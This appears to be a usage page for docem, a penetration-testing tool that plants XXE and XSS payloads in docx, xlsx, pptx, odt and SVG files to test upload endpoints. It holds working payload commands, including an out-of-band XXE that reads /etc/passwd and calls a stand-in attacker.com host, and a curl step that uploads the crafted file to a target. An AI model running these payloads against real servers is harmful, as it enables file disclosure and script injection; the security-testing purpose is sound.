Description
docem embeds XXE and XSS payloads into Office documents (docx, odt, pptx, xlsx) and other XML-based file formats. When a server processes the uploaded document, the embedded payload triggers. Critical for testing file upload functionality.
Installation
BASH
git clone https://github.com/whitel1st/docem.git
cd docem
pip3 install -r requirements.txtBasic Usage
BASH
# Embed XXE in docx
python3 docem.py -s sample.docx -pt xxe -o evil.docx
# Embed XSS in docx
python3 docem.py -s sample.docx -pt xss -o evil.docxAdvanced Usage
BASH
# Custom XXE payload
python3 docem.py -s sample.docx -pt xxe -pm '<!ENTITY xxe SYSTEM "http://attacker.com/xxe">' -o evil.docx
# OXML_XXE mode (embed in all XML files within the OOXML archive)
python3 docem.py -s sample.docx -pt xxe -pm all -o evil.docx
# Target OOB exfiltration
python3 docem.py -s sample.docx -pt xxe -pm '<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">%dtd;' -o evil.docx
# Supported formats: docx, xlsx, pptx, odt, ods, odp, svg
python3 docem.py -s sample.xlsx -pt xxe -o evil.xlsx
python3 docem.py -s sample.pptx -pt xxe -o evil.pptxCommon Workflows
BASH
# File upload XXE testing
# Step 1: Create payload document
python3 docem.py -s template.docx -pt xxe -o evil.docx
# Step 2: Upload to target file upload endpoint
curl -F "file=@evil.docx" https://target.com/upload
# Step 3: Monitor OOB callback
# Check Interactsh/Burp Collaborator for DNS/HTTP callbacks
# XSS via document
python3 docem.py -s template.docx -pt xss -o xss.docx
# Upload → if rendered in browser, XSS fires